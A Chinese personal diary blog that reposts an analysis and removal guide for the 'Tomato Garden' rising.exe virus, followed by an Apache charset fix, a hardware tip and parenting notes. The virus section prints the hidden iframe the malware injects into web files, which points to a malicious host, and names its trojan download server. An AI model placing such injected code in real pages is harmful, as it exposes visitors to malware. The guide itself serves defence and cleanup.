学习日记

很想好好学习一门语言，毅力才是外婆最缺乏的。。

转载者前言：

尽管我是小心又小心，不过前几天不知什么时候电脑里的windows xp sp2出现异常：

1、在进程中出现junhui.exe等等陌生的进程；

2、在几个分区的根目录下出现rising.exe的文件；

3、一些可执行文件的文件属性被改，如：公司名称改为：番茄花园，原始文件名改为：fso.exe等等（如果没有记错的话，基本上是这样的）；

4、可执行文件的后缀由exe改为eve了，然后重新有一个不同字节长度的exe文件；

5、后来，双击分区不能打开分区了，出现打开方式对话框；

6、发现一些陌生的exe文件和dll文件在C盘的一些目录中。

经查，是中了一个叫番茄花园的病毒。因为这个xp系统用了可能好几个月没有重装了，加上又中了这么一个难缠的病毒，把windows分区全部删除（C盘是NTFS格式）并格式化，重新装了xp系统。

后来，查到一篇详细介绍这个病毒的文章，就把它转载到这里了。

××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

转自：番茄花园病毒rising.exe(修改系统时间并感染exe)的清除: http://www.45it.com/Article/pcedu/Safety/200705/15794.htm

番茄花园病毒rising.exe(修改系统时间并感染exe)的清除

作者:newcentu… 　　文章出处:剑盟 　　更新时间:2007-5-5

　　今天发现此种病毒求助者见多，收到样本后，利马测试了一下。该病毒就是前些日子流行的“修改系统时间”的病毒之变种。此次变种可谓是集N种破坏性病毒之大成了。主要破坏功能有：1.感染exe 并使得被感染的exe的公司等属性变为“番茄花园”

　　2.感染html asp 等文件 插入恶意代码

　　3.通过双击磁盘启动

　　4.下载木马，盗取网游帐号

　　5.修改注册表 使系统无法显示隐藏文件

　　6.通过hook API 函数 导致任务管理器中 无法看见其进程

　　分析报告如下：

 File: rising.exe

Size: 64775 bytes

File Version: 1.00

MD5: 86311B37D938BB35645E7B092014DD63

SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3

CRC32: 88ABBD9B

rising.exe 运行后 首先释放一个rising.eve的文件 然后由rising.exe启动他

之后 释放139CA82A.EXE 139CA82A.dll（随机的8个数字字母组合成的文件名）到系统文件夹

注册服务139CA82A.EXE

139CA82A.EXE控制winlogon进程 使得139CA82A.dll插入几乎所有进程

释放rising.exe 和autorun.inf 到每个分区 使得双击磁盘启动

感染 除系统分区外的exe文件 使得其公司名全变为 番茄花园

感染 html asp 等文件 在其后面插入代码

<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>

修改系统时间 随机把年份往前调 月，日不变

修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue:

值为 0x00000000

导致无法显示临时文件

rising.exe 还会hook 多个 API函数 使其进程在任务管理器中隐藏

使用Explorer.exe连接网络 61.152.92.98:80下载木马

下载的木马一般为K117815XXXXX.exe

XXXXX代表随机

到系统文件夹

由于 每台机器上下载的木马的名称不同 但最后结果相同 所以中间释放的过程省略

最后 这些木马运行后分别释放了如下文件

C:\WINDOWS\system32\buchehuo.exe（创建了服务inetsvr）

C:\WINDOWS\system32\cmdbs.dll

C:\WINDOWS\cmdbs.exe

C:\WINDOWS\system32\Kvsc3.dll

C:\WINDOWS\Kvsc3.exe

C:\WINDOWS\system32\mppds.dll

C:\WINDOWS\mppds.exe

C:\WINDOWS\system32\msccrt.dll

C:\WINDOWS\msccrt.exe

C:\WINDOWS\system32\winform.dll

C:\WINDOWS\winform.exe

C:\WINDOWS\system32\winsock.exe

临时文件夹下 释放upxdnd.exe和upxdnd.dll

　　解决办法：

　　安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)

　　首先把系统日期 改回来

　　然后打开sreng(可到down.45it.com下载)

　　启动项目 注册表 删除如下项目

 <upxdnd><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe> []

<msccrt><C:\WINDOWS\msccrt.exe> []

<cmdbs><C:\WINDOWS\cmdbs.exe> []

<mppds><C:\WINDOWS\mppds.exe> []

<Kvsc3><C:\WINDOWS\Kvsc3.exe> []

<winform><C:\WINDOWS\winform.exe> []

　　“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，

　　选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：

 139CA82A / 139CA82A

Wireless Zero Conflguration / inetsvr

把下面的 代码拷入记事本中然后另存为1.reg文件

 Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]

"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"

"Text"="@shell32.dll,-30500"

"Type"="radio"

"CheckedValue"=dword:00000001

"ValueName"="Hidden"

"DefaultValue"=dword:00000002

"HKeyRoot"=dword:80000001

"HelpID"="shell.hlp#51105"

　　双击1.reg把这个注册表项导入注册表

　　然后双击我的电脑－工具－文件夹选项－查看－显示所有文件和文件夹，把“隐藏受保护的系统文件”的勾去掉。

　　右键 点击C盘 点击右键菜单中的“打开”打开C盘 （千万不要双击）（如图）

　　删除 如下文件

 C:\rising.exe

C:\autorun.inf

C:\WINDOWS\system32\buchehuo.exe

C:\WINDOWS\system32\cmdbs.dll

C:\WINDOWS\cmdbs.exe

C:\WINDOWS\system32\Kvsc3.dll

C:\WINDOWS\Kvsc3.exe

C:\WINDOWS\system32\mppds.dll

C:\WINDOWS\mppds.exe

C:\WINDOWS\system32\msccrt.dll

C:\WINDOWS\msccrt.exe

C:\WINDOWS\system32\winform.dll

C:\WINDOWS\winform.exe

C:\WINDOWS\system32\winsock.exe

C:\WINDOWS\unspapik.txt

C:\WINDOWS\wiasevct.txt

C:\WINDOWS\wiasvctr.txt

C:\WINDOWS\ganran.txt

C:\WINDOWS\system32\139CA82A.DLL（随机的8个数字字母组合成的文件名）

C:\WINDOWS\system32\139CA82A.EXE（随机的8个数字字母组合成的文件名）

C:\WINDOWS\system32\K117815XXXXX.exe（XXXXX代表随机数字）

清空C:\Documents and Settings\用户名\Local Settings\Temp

　　右键 点击分别打开系统分区以外的分区 还是点击右键菜单中的“打开” （千万不要双击）

　　删除每个分区下面的autorun.inf和rising.exe文件

　　最后使用专杀 全盘杀毒(可到down.45it.com下载)

　　电脑软硬件应用编辑注：本文来源为：剑盟论坛，作者newcentury，本文为在原创作者的基础上进行整理和修改上建立的。如有疑问请请发布评论即可。我们会做相关处理。谢谢支持和合作

*****************************************************************************************************

                                转帖完毕

今天在redhat linux9.0下安装了apache服务器，启动后不能正常显示gb2312中文网页，可以正常显示utf-8中文网页。

 据文章：[精华] [原创]解决apache显示乱码的方法- 关怀(爱)IT人: http://www.ghitr.com/article/show-33698.html 介绍，将文件/etc/httpd/conf/httpd.conf中的“AddDefaultCharset ISO-8859-1” 改为“AddDefaultCharset off”解决问题。访问UTF-8的中文网页也没问题。

 原文章还说，改成：AddDefaultCharset GB2312 也行，试了一下，确实如此。

摸计算机也有10年左右了，我碰到的不少所谓的问题就是把内存条拔出来用橡皮擦一擦，把显卡拔出来用橡皮擦一擦解决问题。还有比如软驱、光驱的维护也就是把灰尘用酒精擦一擦，或者再加上打点润滑油。

前几天，我家里那台Duron 700老是一开机就是黑屏，什么反映都没有，要启动多次才能把机器启动。在前一步自检通过后，又时不时出现“WINDOWS无法启动,system32\drivers\pci.sys损坏或者丢失”的提示而使系统不能启动。我在网上查了一下，从百度知道的一篇文章中WINDOWS无法启动,system32\drivers\pci.sys损坏或者丢失中得知，这个可能是内存条受灰尘影响的缘故。

想起这几天机器的不正常现象，我把内存条和显卡拔下来用橡皮仔细擦了擦后插上，然后开机，一切正常。到今天为止，电脑还是一切正常，看来又是灰尘惹的祸了。

如果您的电脑出现类似问题，不妨如法炮制。

现在，接连几天晚上，孩子不再要求我给她讲睡前故事，而是她给我讲。

她给我讲《小蝌蚪找妈妈》，说的是一口标准的普通话，有声有色，语气抑扬顿措，虽然故事还讲得不是很流利，但是总体效果我感觉比我给她讲讲得好。我给她讲是把故事按字复述一遍，而她给我讲是带着感情的。

睡前，孩子除了给我讲故事，她还要给我唱歌跳舞，而且是在被窝里唱歌跳舞(littlebat注：跳舞的五笔编码为：KHRL)。她在被窝里睡着，一边唱，唱的是《我和奶奶去买菜》、《我在马路上捡到一分钱》等等，还一边手舞足蹈，忙得不亦乐乎。真是一个快乐的小孩。

不过，这几天，我发现孩子上学不肯进教室，尤其是老师在教室里的时候，她也不像原来那样主动的高高兴兴的喊“老师好”了，而是等老师叫她她才进教室。也不知道究竟是怎么一回事？我问孩子为什么她不肯进教室，她说她“不好意思”。我怀疑是上次老师让我写一篇育儿的心得张贴到孩子们的教室门口，我把上次写的那篇“一次成功的安抚孩子和一次成功的劝服孩子”打印了交给老师算是交差（只是日记，不含后来添加的那篇日记的评论），也许是大家读了那篇日记后，对孩子的态度在无形中有了微妙的变化，而这种变化被孩子敏锐的捕捉到了，于是，就出现了不肯进教室，不喊老师的行为。当然这只是我的猜测。

不过，为保险起见，我要求老师把贴在教室门口的那篇我的育儿日记撕下来。老师说育儿心得是一周一换，下周就会给我撤下来。

孩子的不肯进教室和喊老师的行为继续观察中。。。

女儿是比较任性的，只要她认定的事，不按她的心愿来做，往往弄得小孩哭闹，大人生气的情况。但是，前两天进行了一次成功的安抚活动和一次成功的劝服活动。关键在于：

1、要有爱心、耐心和宽容心；

2、要站在孩子的角度替孩子作想；

3、孩子是讲道理的；

4、不要动手打孩子。

具体情况如下：

一天晚上，孩子要自己动手拿起小铁锤和小钉子替她的堂姐做一把木剑，而且坚决不让我们大人帮忙。我知道她是做不出来的，但是让她尝试一下。我出去办事去了。

回来后，我发现孩子在茶几上用小铁锤钉木剑，肯定把茶几面要弄坏。她的外婆在旁边看着她，没有阻止，我想她是阻止了的，但她拗不过孩子。

1）、我先反复劝孩子不要钉，她不听。压下动手打她的火气，自从许久以前，我下决心不再打孩子后，我最大的动作就是扬起手，吓吓她；

2）、我明白现在孩子的心里也很窝火，自己怎么也做不成这把木剑。我把她手中的东西强行给她拿了，她当然不依。又哭又闹；

3）、我把孩子抱起来，反复给她讲，这样做会把茶几钉坏。并自问自答的给她表演假如妈妈看见她把茶几钉坏了的反应：

  “是谁把茶几钉坏了？!”

  “桥桥。”

  “这么好的茶几给钉坏了，给我打!”

然后把就假装用手轻轻打她。然后我就站在她的心理的角度安慰她。

  “我知道桥桥给姐姐做的剑没做好，心里着急。明天爸爸给你做一个。。。”

   。。。

一会儿，孩子不哭闹了，不好意思的在我怀里撒娇。结果第二天孩子好像忘了这件事，我也就没有给她做木剑了。现在想来，尽管孩子已经忘记了，我应该主动提出来给孩子做一把木剑。让孩子知道大人说话是算数的，尽管她自己已经忘记了。

第二天，孩子不愿扎头发，大人勉强给她扎了一侧，她就挣脱跑了。我去把她追回来，不管她又哭又闹，把她抱到梳妆台前，让她看自己头发乱糟糟的样子。她看着看着就同意我们给她扎头发了。所以，孩子是讲道理的。

之所以详细记下成功的安抚和劝服行动，是因为原来我往往处理不好这样的“冲突”，现在有点心得了，赶快记在这里，防止忘记了，以免以后犯同样的毛病。弄得大家都不舒服。而且，我感觉有必要开一个“家庭会议”，把自己的心得同大家分享一下，并统一一下对孩子的教育策略和具体操作，免得她钻我们的空子，和纠正一些家庭成员不当的对待孩子的思想。我想，在这样的思想指导下，我们家里基本上应该只有孩子的笑声，没有孩子的哭声的:)

春天疾病多，幼儿园统一通知上周星期五放假去防疫站给孩子打了预防“麻疹和腮腺炎”的疫苗。

孩子现在非常大方，小朋友到家里来玩，苹果、奶粉自己去拿出来一人一个，一人一小袋，大人说苹果太大了让她和小朋友分着吃也不行。当然，我们大人对这种大方的态度应持肯定态度。

今天早上，孩子起来自己穿好了衣服。我认真的夸讲了她。天气比较热了，孩子的衣服穿得少了，应该让她自己穿衣服了。关键是培养她的自理能力。

星期五那天打疫苗回来的路上，和她同行的一个小朋友趁售货员不注意偷偷拿了一样东西跑掉了，而那个小朋友的婆婆还在笑，真不知该怎么给那个小朋友的婆婆说。当我们孩子的婆婆回来给我说起这事，我严肃的说我们孩子坚决不能有这种行为。我们孩子的婆婆和爷爷劝我不要去给那个拿东西的小朋友的婆婆说，说这样别人面子上过不去。我心里觉得欠欠的，也只好作罢。

女儿近况总结

近段时间来，孩子好像特别喜欢与她同龄的院里的小朋友玩了。而且，常常是一回家就去找小朋友玩，连饭也顾不得吃，到了吃饭时间也叫不回来，常常被我们大人强迫的押回家。而原来她是喜欢同比她大几岁的哥哥姐姐们一起玩的。

现在孩子倔强的脾气好像有了一点好转，比如有时上学她要求给她买东西，我们给她说当时不买，她也能听得进去了。

原来看过很多遍的动画片她仍然能看得两个小时不动地方。还有，孩子现在对家里的电器插座突然有了兴趣，喜欢自己动手去插。我们在再三严厉的说她的同时，把所有移动的插线板都挂在了高处。

因为单位现在的纪律强调得比较严，相应的带来的一个好处是孩子也总是能准时到幼儿园了（因为我上班的地方与孩子上幼儿园的地方顺路）。看来迟到也不是不能避免的嘛。

原来女儿是不扎头发的，现在也渐渐习惯我们给她扎头发了。

在幼儿园的教育上，好像自从他们使用了那种新教材后，幼儿园与家长在孩子的教育上的沟通要强些了。比如，上周孩子带回来两个题目：一是和孩子一起在杂志、报纸上搜集一些海陆空的交通工具图片；一是带孩子到车站去了解乘车的一些问题，让孩子熟悉交通规则等等。原来，他们上一周的课程以交通工具为主题。在原来过去的一年半的幼儿园时间里，我们和幼儿园的沟通是很少的。

最近两个星期天我们都带孩子到野外去玩了的，这种户外的活动还是要坚持的，多亲近点大自然。我听说人是从绿色的森林里走出来的，到现在成天住在钢筋混凝土的灰色的森林里，差不多快忘了人是从哪儿走出来的。

前段时间读了一篇＜＜读者＞＞上的鲁迅的孩子周海婴的回忆录，里面有一处写鲁迅先生对他幼年的教育上，大意是如果不是非常过分的要求，鲁迅先生都是十分“纵容“他的。我想，孩子在一种宽松的、爱的氛围中成长，有个快乐的童年是不会错到什么地方去的吧？这篇文章在我的心里好像对我前些时间萌发的对孩子宽松些的想法提供了一点佐证。人一辈子是很辛苦的，幼年、童年都没有一个大体上快乐的记忆。我觉得是不当的。